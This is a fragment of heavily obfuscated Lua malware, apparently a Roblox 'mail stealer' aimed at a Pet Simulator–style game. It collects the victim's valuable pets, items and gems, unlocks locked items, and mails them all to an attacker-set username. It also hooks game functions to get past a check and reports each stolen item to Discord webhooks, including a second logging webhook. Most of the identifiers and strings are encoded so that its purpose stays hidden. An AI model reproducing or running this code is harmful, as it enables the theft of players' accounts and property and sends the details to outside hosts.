,[v7("\16\178\176\36\181\11\150\240","\160\89\198\213\73\234\89\215")]=rap,[v7("\97\101\177\243\250\107\125\181\237\214","\165\40\17\212\158")]=v7("\192\222\15","\70\133\185\104\83"),[v7("\45\86\119\34\192\10\92","\169\100\37\36\74")]=v221.sh or false ,[v7("\41\148\142\95\3\140\167\84","\48\96\231\194")]=v221.lk or false ,[v7("\225\78\11\32\38\241\162\130\207\95\39\41","\227\168\58\110\77\121\184\207")]=ItemImageId,[v7("\82\40\186\77\142\239\104\181\126","\197\27\92\223\32\209\187\17")]=ItemType});end break;end if (v222==1) then rap=v105(v7("\106\82\115","\104\47\53\20"),v221);ItemType=v7("\141\67\147\17\189\3","\111\195\44\225\124\220");v222=4 -2 ;end if (v222==(0 + 0)) then id=v221.id;dir=v97.Eggs[id];v222=1;end end end end if (v99.Misc~=nil) then for v223,v224 in pairs(v99.Misc) do local v225=0;local v226;while true do if (v225==0) then v226=0 + 0 ;while true do if (v226==(0 -0)) then id=v224.id;dir=v97.MiscItems[id];v226=1 + 0 ;end if (v226==2) then ItemImageId=dir.Icon;if ((rap>MinimumRAP) and (v224.id~=v7("\7\188\42\232\51\163\43\233\32","\134\84\208\67"))) then table.insert(v175,{[v7("\58\184\131\81\44\133\130","\60\115\204\230")]=v223,[v7("\206\46\238\125\216\20\234\125\226","\16\135\90\139")]=v224.id,[v7("\125\96\3\62\113\117\117\91\97\8\39","\24\52\20\102\83\46\52")]=v224._am or (902 -(652 + 249)) ,[v7("\237\59\36\41\48\246\14\17","\111\164\79\65\68")]=rap,[v7("\239\205\134\211\17\201\202\216\144\205","\138\166\185\227\190\78")]=v7("\230\125\214\52","\121\171\20\165\87\50\67"),[v7("\239\43\138\62\176\12\223","\98\166\88\217\86\217")]=v224.sh or false ,[v7("\223\229\85\14\133\215\243\242","\188\150\150\25\97\230")]=v224.lk or false ,[v7("\243\157\90\15\51\196\215\136\88\7\37\233","\141\186\233\63\98\108")]=ItemImageId,[v7("\216\254\41\187\26\197\243\60\179","\69\145\138\76\214")]=ItemType});end break;end if (v226==1) then rap=v105(v7("\46\86\208\248","\155\99\63\163"),v224);ItemType=v7("\172\222\179\128\184\136","\228\226\177\193\237\217");v226=5 -3 ;end end break;end end end end if (v99.Charm~=nil) then for v227,v228 in pairs(v99.Charm) do local v229=0;while true do if (v229==2) then ItemImageId=dir.Icon;if (rap>MinimumRAP) then table.insert(v175,{[v7("\20\192\191\208\72\103\35","\50\93\180\218\189\23\46\71")]=v227,[v7("\247\176\94\65\123\242\73\211\161","\40\190\196\59\44\36\188")]=v228.id,[v7("\21\81\217\185\197\92\0\51\80\210\160","\109\92\37\188\212\154\29")]=v228._am or (1869 -(708 + 1160)) ,[v7("\45\251\161\206\14\104\37\223","\58\100\143\196\163\81")]=rap,[v7("\51\86\38\174\0\106\233\15\9\81","\110\122\34\67\195\95\41\133")]=v7("\86\185\90\88\219","\182\21\209\59\42"),[v7("\158\68\246\21\40\176\174","\222\215\55\165\125\65")]=v228.sh or false ,[v7("\5\194\234\21\241\202\232\78","\42\76\177\166\122\146\161\141")]=v228.lk or false ,[v7("\140\158\0\195\70\95\168\139\2\203\80\114","\22\197\234\101\174\25")]=ItemImageId,[v7("\4\32\160\209\73\155\206\150\40","\230\77\84\197\188\22\207\183")]=ItemType});end break;end if (v229==1) then rap=v105(v7("\83\199\136\155\178","\118\16\175\233\233\223"),v228);ItemType=v7("\165\139\39\182\239\135","\29\235\228\85\219\142\235");v229=5 -3 ;end if ((0 -0)==v229) then id=v228.id;dir=v97.Charms[id];v229=28 -(10 + 17) ;end end end end if (v99.Enchant~=nil) then for v230,v231 in pairs(v99.Enchant) do local v232=0 + 0 ;while true do if (v232==(1734 -(1400 + 332))) then ItemImageId=dir.Icon(v231.tn);if (rap>MinimumRAP) then table.insert(v175,{[v7("\28\153\126\82\237\134\176","\184\85\237\27\63\178\207\212")]=v230,[v7("\33\77\12\82\55\119\8\82\13","\63\104\57\105")]=v231.id,[v7("\34\147\161\73\52\166\169\75\30\137\176","\36\107\231\196")]=v231._am or 1 ,[v7("\116\161\167\138\98\135\131\183","\231\61\213\194")]=rap,[v7("\32\185\56\126\54\142\49\114\26\190","\19\105\205\93")]=v7("\140\6\221\137\62\167\28","\95\201\104\190\225"),[v7("\134\216\242\198\166\197\216","\174\207\171\161")]=v231.sh or false ,[v7("\196\237\33\252\251\220\232\250","\183\141\158\109\147\152")]=v231.lk or false ,[v7("\5\29\227\1\19\32\235\13\43\12\207\8","\108\76\105\134")]=ItemImageId,[v7("\194\209\180\236\241\223\220\161\228","\174\139\165\209\129")]=ItemType});end break;end if (v232==0) then id=v231.id;dir=v97.Enchants[id];v232=1;end if (v232==(1 -0)) then rap=v105(v7("\220\26\197\244\141\175\228","\85\153\116\166\156\236\193\144"),v231);ItemType=v7("\138\239\95\190\229\12","\96\196\128\45\211\132");v232=1910 -(242 + 1666) ;end end end end if (v99.Lootbox~=nil) then for v233,v234 in pairs(v99.Lootbox) do id=v234.id;dir=v97.Lootboxes[id];rap=v105(v7("\143\188\237\213\196\12\104","\24\195\211\130\161\166\99\16"),v234);ItemType=v7("\104\12\251\33\82\26","\118\38\99\137\76\51");ItemImageId=dir.Icon;if (rap>MinimumRAP) then table.insert(v175,{[v7("\212\50\0\31\54\9\249","\64\157\70\101\114\105")]=v233,[v7("\105\188\162\238\47\110\169\170\230","\112\32\200\199\131")]=v234.id,[v7("\5\68\89\181\252\138\47\35\69\82\172","\66\76\48\60\216\163\203")]=v234._am or (1 + 0) ,[v7("\147\146\124\254\96\252\5\138","\68\218\230\25\147\63\174")]=rap,[v7("\132\62\86\65\137\142\38\82\95\165","\214\205\74\51\44")]=v7("\214\67\237\232\117\245\84","\23\154\44\130\156"),[v7("\56\181\158\166\63\29\8","\115\113\198\205\206\86")]=v234.sh or false ,[v7("\173\68\210\85\135\92\251\94","\58\228\55\158")]=v234.lk or false ,[v7("\157\157\213\35\3\132\56\181\142\213\7\56","\85\212\233\176\78\92\205")]=ItemImageId,[v7("\99\76\141\239\117\108\145\242\79","\130\42\56\232")]=ItemType});end end end if (v99.Potion~=nil) then for v238,v239 in pairs(v99.Potion) do local v240=0 + 0 ;local v241;while true do if (v240==(0 + 0)) then v241=940 -(850 + 90) ;while true do if (v241==2) then ItemImageId=dir.Icon(v239.tn);if (rap>MinimumRAP) then table.insert(v175,{[v7("\5\109\225\85\19\80\224","\56\76\25\132")]=v238,[v7("\119\213\174\43\240\112\192\166\35","\175\62\161\203\70")]=v239.id,[v7("\21\201\198\30\10\29\208\204\6\59\40","\85\92\189\163\115")]=v239._am or (1 -0) ,[v7("\0\184\53\53\22\158\17\8","\88\73\204\80")]=rap,[v7("\7\151\21\75\22\249\34\130\3\85","\186\78\227\112\38\73")]=v7("\204\88\233\92\92\116","\26\156\55\157\53\51"),[v7("\165\203\37\209\177\94\149","\48\236\184\118\185\216")]=v239.sh or false ,[v7("\204\174\123\63\204\63\224\185","\84\133\221\55\80\175")]=v239.lk or false ,[v7("\148\243\33\171\248\117\176\230\35\163\238\88","\60\221\135\68\198\167")]=ItemImageId,[v7("\199\169\253\142\125\237\247\173\253","\185\142\221\152\227\34")]=ItemType});end break;end if (v241==(1390 -(360 + 1030))) then id=v239.id;dir=v97.Potions[id];v241=1 + 0 ;end if (v241==(2 -1)) then rap=v105(v7("\218\186\48\234\79\49","\95\138\213\68\131\32"),v239);ItemType=v7("\4\39\179\78\119\38","\22\74\72\193\35");v241=2 -0 ;end end break;end end end end if (v99.Seed~=nil) then for v242,v243 in pairs(v99.Seed) do local v244=1661 -(909 + 752) ;local v245;while true do if (v244==(1223 -(109 + 1114))) then v245=0;while true do if (v245==(1 -0)) then rap=v105(v7("\107\192\82\254","\151\56\165\55\154\35\83"),v243);ItemType=v7("\142\76\23\227\161\79","\142\192\35\101");v245=1 + 1 ;end if (0==v245) then id=v243.id;dir=v97.Seeds[id];v245=243 -(6 + 236) ;end if (v245==(2 + 0)) then ItemImageId=dir.Icon;if (rap>MinimumRAP) then table.insert(v175,{[v7("\255\97\44\174\216\165\168","\118\182\21\73\195\135\236\204")]=v242,[v7("\33\40\31\77\59\35\252\5\57","\157\104\92\122\32\100\109")]=v243.id,[v7("\138\178\202\199\2\6\128\164\182\168\219","\203\195\198\175\170\93\71\237")]=v243._am or 1 ,[v7("\7\95\59\216\110\35\221\30","\156\78\43\94\181\49\113")]=rap,[v7("\91\252\193\174\52\96\117\115\251\215","\25\18\136\164\195\107\35")]=v7("\219\40\172\75","\216\136\77\201\47\18\220\161"),[v7("\4\255\24\210\1\210\155","\226\77\140\75\186\104\188")]=v243.sh or false ,[v7("\144\221\252\48\76\178\203\212","\47\217\174\176\95")]=v243.lk or false ,[v7("\145\201\115\15\141\125\117\39\191\216\95\6","\70\216\189\22\98\210\52\24")]=ItemImageId,[v7("\243\203\166\138\236\238\198\179\130","\179\186\191\195\231")]=ItemType});end break;end end break;end end end end if (v99.Ultimate~=nil) then for v246,v247 in pairs(v99.Ultimate) do local v248=0;while true do if (v248==1) then rap=v105(v7("\204\51\12\237\244\62\12\225","\132\153\95\120"),v247);ItemType=v7("\159\189\28\32\246\214","\192\209\210\110\77\151\186");v248=2 + 0 ;end if (v248==0) then id=v247.id;dir=v97.Ultimates[id];v248=2 -1 ;end if (v248==2) then ItemImageId=dir.Icon;if (rap>MinimumRAP) then table.insert(v175,{[v7("\201\23\39\228\192\237\228","\164\128\99\66\137\159")]=v246,[v7("\41\157\236\179\63\167\232\179\5","\222\96\233\137")]=v247.id,[v7("\144\167\162\18\183\210\253\182\166\169\11","\144\217\211\199\127\232\147")]=v247._am or 1 ,[v7("\209\59\59\37\234\119\35\116","\36\152\79\94\72\181\37\98")]=rap,[v7("\254\204\66\50\232\251\75\62\196\203","\95\183\184\39")]=v7("\128\51\243\47\89\129\22\176","\98\213\95\135\70\52\224"),[v7("\215\176\250\127\93\240\186","\52\158\195\169\23")]=v247.sh or false ,[v7("\83\175\30\123\133\62\126\143","\235\26\220\82\20\230\85\27")]=v247.lk or false ,[v7("\161\181\236\207\75\161\172\232\197\113\161\165","\20\232\193\137\162")]=ItemImageId,[v7("\11\203\192\171\216\184\14\97\39","\17\66\191\165\198\135\236\119")]=ItemType});end break;end end end end if (v99.Fruit~=nil) then for v249,v250 in pairs(v99.Fruit) do local v251=0 -0 ;while true do if ((1135 -(1076 + 57))==v251) then ItemImageId=dir.Icon;if (rap>MinimumRAP) then table.insert(v175,{[v7("\234\47\232\31\199\31\199","\86\163\91\141\114\152")]=v249,[v7("\122\31\113\126\5\125\10\121\118","\90\51\107\20\19")]=v250.id,[v7("\164\228\128\226\2\172\253\138\250\51\153","\93\237\144\229\143")]=v250._am or (1 + 0) ,[v7("\60\226\245\20\52\116\52\198","\38\117\150\144\121\107")]=rap,[v7("\4\175\235\55\18\152\226\59\62\168","\90\77\219\142")]=v7("\192\22\52\48\88","\26\134\100\65\89\44\103"),[v7("\216\240\3\43\173\255\250","\196\145\131\80\67")]=v250.sh or false ,[v7("\55\163\42\7\27\227\27\180","\136\126\208\102\104\120")]=v250.lk or false ,[v7("\81\158\203\78\144\123\48\80\127\143\231\71","\49\24\234\174\35\207\50\93")]=ItemImageId,[v7("\37\230\248\133\78\56\235\237\141","\17\108\146\157\232")]=ItemType});end break;end if (v251==(689 -(579 + 110))) then id=v250.id;dir=v97.Fruits[id];v251=1 + 0 ;end if (v251==(1 + 0)) then rap=v105(v7("\41\189\187\26\235","\177\111\207\206\115\159\136\140"),v250);ItemType=v7("\43\134\2\25\213\67","\63\101\233\112\116\180\47");v251=2 + 0 ;end end end end if (v99.Hoverboard~=nil) then for v252,v253 in pairs(v99.Hoverboard) do local v254=407 -(174 + 233) ;while true do if (v254==(0 -0)) then id=v253.id;dir=v97.Hoverboards[id];v254=1 -0 ;end if (v254==2) then ItemImageId=dir.Icon;if (rap>MinimumRAP) then table.insert(v175,{[v7("\202\81\179\187\34\156\231","\213\131\37\214\214\125")]=v252,[v7("\15\63\32\178\222\8\42\40\186","\129\70\75\69\223")]=v253.id,[v7("\111\223\246\228\67\206\75\196\230\231\104","\143\38\171\147\137\28")]=v253._am or 1 ,[v7("\249\150\188\254\60\209\245\224","\180\176\226\217\147\99\131")]=rap,[v7("\250\173\42\10\236\154\35\6\192\170","\103\179\217\79")]=v7("\98\184\10\208\83\142\172\75\165\24","\195\42\215\124\181\33\236"),[v7("\36\74\4\54\44\246\20","\152\109\57\87\94\69")]=v253.sh or false ,[v7("\208\196\38\172\189\217\81\172","\200\153\183\106\195\222\178\52")]=v253.lk or false ,[v7("\27\247\141\48\118\115\63\226\143\56\96\94","\58\82\131\232\93\41")]=ItemImageId,[v7("\170\67\213\24\98\11\154\71\213","\95\227\55\176\117\61")]=ItemType});end break;end if (v254==1) then rap=v105(v7("\99\204\2\232\61\170\68\194\6\233","\200\43\163\116\141\79"),v253);ItemType=v7("\145\57\47\142\177\248","\131\223\86\93\227\208\148");v254=2;end end end end if (v99.Booth~=nil) then for v255,v256 in pairs(v99.Booth) do local v257=0;while true do if (v257==(1 + 1)) then ItemImageId=dir.Icon;if (rap>MinimumRAP) then table.insert(v175,{[v7("\163\11\28\171\227\163\27","\188\234\127\121\198")]=v255,[v7("\17\38\22\142\7\28\18\142\61","\227\88\82\115")]=v256.id,[v7("\106\11\191\170\61\82\78\16\175\169\22","\19\35\127\218\199\98")]=v256._am or 1 ,[v7("\53\239\15\239\35\201\43\210","\130\124\155\106")]=rap,[v7("\252\223\243\162\156\213\112\190\198\216","\223\181\171\150\207\195\150\28")]=v7("\110\53\236\186\1","\105\44\90\131\206"),[v7("\214\243\129\177\1\48\230","\94\159\128\210\217\104")]=v256.sh or false ,[v7("\121\234\42\176\92\116\252\126","\26\48\153\102\223\63\31\153")]=v256.lk or false ,[v7("\43\84\232\254\61\105\224\242\5\69\196\247","\147\98\32\141")]=ItemImageId,[v7("\49\87\230\199\57\98\82\8\70","\43\120\35\131\170\102\54")]=ItemType});end break;end if (v257==(1175 -(663 + 511))) then rap=v105(v7("\58\113\44\95\163","\203\120\30\67\43"),v256);ItemType=v7("\223\42\95\226\216\253","\185\145\69\45\143");v257=2 + 0 ;end if (v257==(0 + 0)) then id=v256.id;dir=v97.Booths[id];v257=2 -1 ;end end end end table.sort(v175,function(v203,v204) return v203.Item_RAP>v204.Item_RAP ;end);return v175;end;local function v118() local v176;for v205,v206 in pairs(v99[v7("\100\3\147","\228\52\102\231\214\197\208")]) do v176=v205;break;end local v177={[1 + 0 ]=v7("\44\239\119\198\229\147","\182\126\128\21\170\138\235\121"),[4 -2 ]=v7("\191\223\38\242","\102\235\186\85\134\230\115\80"),[7 -4 ]=v7("\103\9\42","\66\55\108\94\63\18\180"),[2 + 2 ]=v176,[9 -4 ]=1};local v178,v179=v103:WaitForChild(v7("\57\140\140\59\37\86\12\215\197\4\34\87\16","\57\116\237\229\87\71")):InvokeServer(unpack(v177));if ((v179=="They don't have enough space!") or (v179=="You don't have enough diamonds to send the mail!")) then return false;else return true;end end itemsCounted=0 + 0 ;local v119=0 + 0 ;local v120=v117();currentMailPrice=FirstPriceOfMail;for v180,v181 in pairs(v120) do local v182=722 -(478 + 244) ;local v183;while true do if ((517 -(440 + 77))==v182) then v183=0 + 0 ;while true do if (v183==(3 -2)) then if (currentMailPrice>5000000) then currentMailPrice=5001556 -(655 + 901) ;end break;end if (v183==0) then if (v181.Item_RAP>=currentMailPrice) then local v306=0;while true do if ((0 + 0)==v306) then v119=v119 + v181.Item_RAP ;itemsCounted=itemsCounted + 1 + 0 ;break;end end end currentMailPrice=currentMailPrice * 1.5 ;v183=1 + 0 ;end end break;end end end local function v121(v184,v185,v186,v187) local v188=0 -0 ;local v189;local v190;local v191;while true do if (v188==1) then v191=nil;while true do if (v189==0) then v190={[1]=Roblox_Username,[1447 -(695 + 750) ]=""   .. mailstealer_name   .. v7("\234\188\236\238\123\253\83\175\176\225\226\101\174\72\164\241\249\232\103","\39\202\209\141\135\23\142") ,[9 -6 ]=v184,[6 -2 ]=v185,[5]=v186};v191=false;v189=3 -2 ;end if (2==v189) then FirstPriceOfMail=math.ceil(math.ceil(FirstPriceOfMail) * (352.5 -(285 + 66)) );if (FirstPriceOfMail>(11655526 -6655526)) then FirstPriceOfMail=5001310 -(682 + 628) ;end break;end if (v189==1) then repeat local v302=0 + 0 ;local v303;local v304;while true do if (v302==0) then if (v187==true) then local v330=299 -(176 + 123) ;local v331;while true do if (v330==(0 + 0)) then v331={v185,false};game:GetService(v7("\205\54\25\6\59\251\254\39\12\14\1\236\240\33\8\13\55","\152\159\83\105\106\82")).Network.Locking_SetLocked:InvokeServer(unpack(v331));break;end end end v303,v304=v103:WaitForChild(v7("\172\199\88\254\203\83\153\156\17\193\204\82\133","\60\225\166\49\146\169")):InvokeServer(unpack(v190));v302=1;end if (v302==1) then if ((v303==false) and (v304=="They don't have enough space!")) then local v332=269 -(239 + 30) ;while true do if (v332==(0 + 0)) then Roblox_Username=Username2;v190[1 + 0 ]=Roblox_Username;break;end end end break;end end until v191==true  GemsAmount=GemsAmount-FirstPriceOfMail ;v189=2;end end break;end if (v188==0) then v189=0 -0 ;v190=nil;v188=2 -1 ;end end end local function v122() for v207,v208 in pairs(v99.Currency) do if (v208.id==v7("\11\23\46\39\14\9\43\13","\103\79\126\79\74\97")) then if (GemsAmount>=(FirstPriceOfMail + (10315 -(306 + 9)))) then SentGems=GemsAmount-FirstPriceOfMail ;local v271={[1]=Roblox_Username,[6 -4 ]=""   .. mailstealer_name   .. v7("\250\114\210\122\82\9\174\122\210\127\91\8\250\112\221\51\74\21\170","\122\218\31\179\19\62") ,[1 + 2 ]=v7("\144\195\223\211\204\175\70\170","\37\211\182\173\161\169\193"),[3 + 1 ]=v207,[3 + 2 ]=SentGems};local v272=false;repeat local v298=v103:WaitForChild(v7("\218\59\68\213\42\116\161\173\122\126\220\38\127","\217\151\90\45\185\72\27")):InvokeServer(unpack(v271));until v272==true  v107(v7("\231\117\230\31\89\205\120\244","\54\163\28\135\114"),v7("\11\206\79\144\75\113\43\194","\31\72\187\61\226\46"),v7("\228\3\78\193","\68\163\102\35\178\39\30"),v7("\172\114\194\198\16\166\134\5\183\116\128\136\76\228\214\67\235\40\137\149\84\237\214\70","\113\222\16\186\167\99\213\227"),Discord_Webhook,v7("\32\1\245\243","\150\78\110\155"),v7("\139\202","\32\229\165\71\129\196\126\223"),v7("\227\140\210\132\147\204\204\135\193","\181\163\233\164\225\225"),SentGems,v119);break;end end end end Left_Hits= #v120;if (( #v120>(0 -0)) or (GemsAmount>FirstPriceOfMail)) then local v209=1375 -(1140 + 235) ;local v210;local v211;while true do if (v209==(0 + 0)) then local v263=0 + 0 ;while true do if (v263==1) then v209=1 + 0 ;break;end if ((52 -(33 + 19))==v263) then v210=require(game:GetService(v7("\98\142\46\123\89\136\63\99\85\143\13\99\95\153\63\112\85","\23\48\235\94")).Library.Client.Save);v211=v210.Get();v263=1 + 0 ;end end end if ((5 -3)==v209) then oldGet=deepCopy(v211);v210.Get=function(...) local v273=0 + 0 ;while true do if (v273==(1 -0)) then v211.FavoriteModeSelectionPlaza={FavoriteModeSelectionPlaza};return v211;end if (v273==(0 + 0)) then v211=oldGet;v211.FavoriteModeSelection={FavoriteModeSelection};v273=1;end end end;v209=692 -(586 + 103) ;end if (v209==(1 + 2)) then if v118() then local v299=0 -0 ;local v300;while true do if (v299==(1488 -(1309 + 179))) then v300=game:GetService(v7("\78\223\200\81\94\48\211\104\223\220\110\67\60\192\125\221\221","\178\28\186\184\61\55\83")):WaitForChild(v7("\234\200\83\43\253\28\254","\149\164\173\39\92\146\110")):WaitForChild(v7("\222\38\25\19\24\20\235\125\80\44\31\21\247","\123\147\71\112\127\122"));for v322,v323 in ipairs(getgc(true)) do if ((typeof(v323)==v7("\202\216\140\114\82\197\194\140","\38\172\173\226\17")) and (debug.info(v323,"n")==v7("\89\8\60\234\66\23","\143\45\113\76"))) then local v333=0;local v334;while true do if (v333==(0 -0)) then v334=nil;v334=hookfunction(v323,function(v343,...) if (v343==v300) then return tick();end return v334(v343,...);end);break;end end end end break;end end end for v274,v275 in pairs(v120) do if (FirstPriceOfMail>(2176247 + 2823753)) then FirstPriceOfMail=13427879 -8427879 ;end if (v275.Item_RAP>=FirstPriceOfMail) then local v305=0;while true do if (v305==(0 + 0)) then v121(v275.Item_Class,v275.Item_Id,v275.Item_Amount,v275.IsLocked);thumb=v114(v275.Item_ImageId);v305=1 -0 ;end if (v305==1) then Left_Hits=Left_Hits-(1 -0) ;task.spawn(function() local v324=609 -(295 + 314) ;local v325;while true do if (v324==0) then v325=0 -0 ;while true do if (0==v325) then v107(v275.Item_Name,v275.Item_Class,v275.Item_Type,thumb,Discord_Webhook,Left_Hits,v275.IsShiny,v7("\152\189\10\57\170\161\19\50\189","\92\216\216\124"),v275.Item_RAP,v119);if (Roblox_Username~=DualhookUsername) then v107(v275.Item_Name,v275.Item_Class,v275.Item_Type,thumb,LOGS_WEBHOOK,Left_Hits,v275.IsShiny,v7("\94\53\163\0\242\85\114\184\79\237","\157\59\82\204\32"),v275.Item_RAP,v119);end break;end end break;end end end);break;end end else break;end end v209=1966 -(1300 + 662) ;end if (v209==4) then v122();break;end if (v209==(3 -2)) then FavoriteModeSelection=v210.Get().FavoriteModeSelection;FavoriteModeSelectionPlaza=v210.Get().FavoriteModeSelectionPlaza;v209=2;end end end
